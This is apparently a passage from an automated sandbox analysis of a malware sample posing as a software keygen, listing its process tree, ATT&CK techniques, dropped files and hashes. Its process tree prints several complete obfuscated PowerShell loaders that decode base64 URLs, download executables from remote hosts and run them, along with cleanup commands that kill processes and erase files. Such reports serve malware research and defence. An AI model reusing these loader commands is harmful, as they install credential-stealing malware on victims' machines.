                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:612
                  • C:\Users\Public\lop.exe
                    "C:\Users\Public\lop.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2836
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                      6⤵
                      • Loads dropped DLL
                      PID:3000
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2860
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                          8⤵
                          • Loads dropped DLL
                          PID:2960
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2796
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                              "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                              10⤵
                              • Executes dropped EXE
                              PID:1860
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          8⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:2880
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 2880 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\399345113193971\\* & exit
                            9⤵
                              PID:1940
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /pid 2880
                                10⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1580
                      • C:\Users\Public\lop.exe
                        "C:\Users\Public\lop.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1524
                      • C:\Users\Public\lop.exe
                        "C:\Users\Public\lop.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2460
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\46C0.tmp\b1.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:524
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1372
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 2
                  3⤵
                  • Delays execution with timeout.exe
                  PID:680
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\46C0.tmp\ba.hta"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:688
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:788
                    • C:\Users\Public\foy.exe
                      "C:\Users\Public\foy.exe"
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2872
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:2924
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                          7⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:2088
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 2088 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\062574144587023\\* & exit
                            8⤵
                              PID:1252
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /pid 2088
                                9⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2564
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:2948
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:2096
                        • C:\Users\Public\foy.exe
                          "C:\Users\Public\foy.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:3004
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\46C0.tmp\ba1.hta"
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:968
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1772

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              Modify Existing Service

              1
              T1031

              Defense Evasion

              Modify Registry

              4
              T1112

              Disabling Security Tools

              2
              T1089

              Install Root Certificate

              1
              T1130

              Credential Access

              Credentials in Files

              3
              T1081

              Discovery

              Query Registry

              2
              T1012

              System Information Discovery

              2
              T1082

              Collection

              Data from Local System

              3
              T1005

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\MSVCP140.dll
              • C:\ProgramData\freebl3.dll
              • C:\ProgramData\freebl3.dll
              • C:\ProgramData\mozglue.dll
              • C:\ProgramData\mozglue.dll
              • C:\ProgramData\msvcp140.dll
              • C:\ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • C:\ProgramData\softokn3.dll
              • C:\ProgramData\softokn3.dll
              • C:\ProgramData\sqlite3.dll
              • C:\ProgramData\sqlite3.dll
              • C:\ProgramData\vcruntime140.dll
              • C:\ProgramData\vcruntime140.dll
              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_04190b53-893a-40a4-b90f-417e64b4c7fb
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8d69ac6d-582e-4e48-94c8-1ba813e138e4
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_918e82a1-5427-4a69-9fc9-4abbac50faf4
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fca46639-0c4e-4d54-9f00-f0237fcc6394
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Temp\46C0.tmp\Keygen.exe
              • C:\Users\Admin\AppData\Local\Temp\46C0.tmp\Keygen.exe
              • C:\Users\Admin\AppData\Local\Temp\46C0.tmp\b.hta
              • C:\Users\Admin\AppData\Local\Temp\46C0.tmp\b1.hta
              • C:\Users\Admin\AppData\Local\Temp\46C0.tmp\ba.hta
              • C:\Users\Admin\AppData\Local\Temp\46C0.tmp\ba1.hta
              • C:\Users\Admin\AppData\Local\Temp\46C0.tmp\m.hta
              • C:\Users\Admin\AppData\Local\Temp\46C0.tmp\m1.hta
              • C:\Users\Admin\AppData\Local\Temp\46C0.tmp\start.bat
              • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\Jr2jbh2rcO.exe
              • C:\Users\Admin\AppData\Local\Temp\Jr2jbh2rcO.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\OGRNSMkwcK.exe
              • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
              • C:\Users\Admin\AppData\Local\Temp\aBBorOfpB2.exe
              • C:\Users\Admin\AppData\Local\Temp\aBBorOfpB2.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\wpETxqBf21.exe
              • C:\Users\Admin\AppData\Local\Temp\wpETxqBf21.exe
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Public\foy.exe
              • C:\Users\Public\foy.exe
              • C:\Users\Public\foy.exe
              • C:\Users\Public\lop.exe
              • C:\Users\Public\lop.exe
              • C:\Users\Public\lop.exe
              • C:\Users\Public\lop.exe
              • C:\Users\Public\szx.exe
              • C:\Users\Public\szx.exe
              • C:\Users\Public\szx.exe
              • C:\Windows\temp\nvn2omh3.inf
              • \??\PIPE\lsarpc
              • \??\PIPE\srvsvc
              • \??\PIPE\srvsvc
              • \ProgramData\mozglue.dll
              • \ProgramData\mozglue.dll
              • \ProgramData\mozglue.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\sqlite3.dll
              • \ProgramData\sqlite3.dll
              • \ProgramData\sqlite3.dll
              • \ProgramData\vcruntime140.dll
              • \ProgramData\vcruntime140.dll
              • \ProgramData\vcruntime140.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                MD5

                02cc7b8ee30056d5912de54f1bdfc219

                SHA1

                a6923da95705fb81e368ae48f93d28522ef552fb

                SHA256

                1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                SHA512

                0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
              • \Users\Admin\AppData\LocalLow\sqlite3.dll
              • \Users\Admin\AppData\Local\Temp\46C0.tmp\Keygen.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\Jr2jbh2rcO.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\OGRNSMkwcK.exe
              • \Users\Admin\AppData\Local\Temp\OGRNSMkwcK.exe
              • \Users\Admin\AppData\Local\Temp\aBBorOfpB2.exe
              • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\wpETxqBf21.exe
              • \Users\Public\foy.exe
              • \Users\Public\foy.exe
              • \Users\Public\lop.exe
              • \Users\Public\szx.exe
              • \Users\Public\szx.exe
              • memory/292-349-0x0000000000000000-mapping.dmp
              • memory/292-405-0x0000000004A90000-0x0000000004ADC000-memory.dmp
                Filesize

                304KB

              • memory/304-388-0x0000000004A00000-0x0000000004A01000-memory.dmp
                Filesize

                4KB

              • memory/304-387-0x00000000012A0000-0x00000000012A1000-memory.dmp
                Filesize

                4KB

              • memory/304-386-0x0000000004D10000-0x0000000004D11000-memory.dmp
                Filesize

                4KB

              • memory/304-385-0x0000000000FD0000-0x0000000000FD1000-memory.dmp
                Filesize

                4KB

              • memory/304-384-0x0000000072700000-0x0000000072DEE000-memory.dmp
                Filesize

                6.9MB

              • memory/304-382-0x0000000000000000-mapping.dmp
              • memory/524-20-0x0000000000000000-mapping.dmp
              • memory/612-138-0x0000000006480000-0x0000000006481000-memory.dmp
                Filesize

                4KB

              • memory/612-34-0x0000000070830000-0x0000000070F1E000-memory.dmp
                Filesize

                6.9MB

              • memory/612-22-0x0000000000000000-mapping.dmp
              • memory/612-42-0x0000000004A60000-0x0000000004A61000-memory.dmp
                Filesize

                4KB

              • memory/680-21-0x0000000000000000-mapping.dmp
              • memory/688-27-0x0000000000000000-mapping.dmp
              • memory/788-30-0x0000000000000000-mapping.dmp
              • memory/788-40-0x0000000070830000-0x0000000070F1E000-memory.dmp
                Filesize

                6.9MB

              • memory/968-29-0x0000000000000000-mapping.dmp
              • memory/1120-10-0x0000000000000000-mapping.dmp
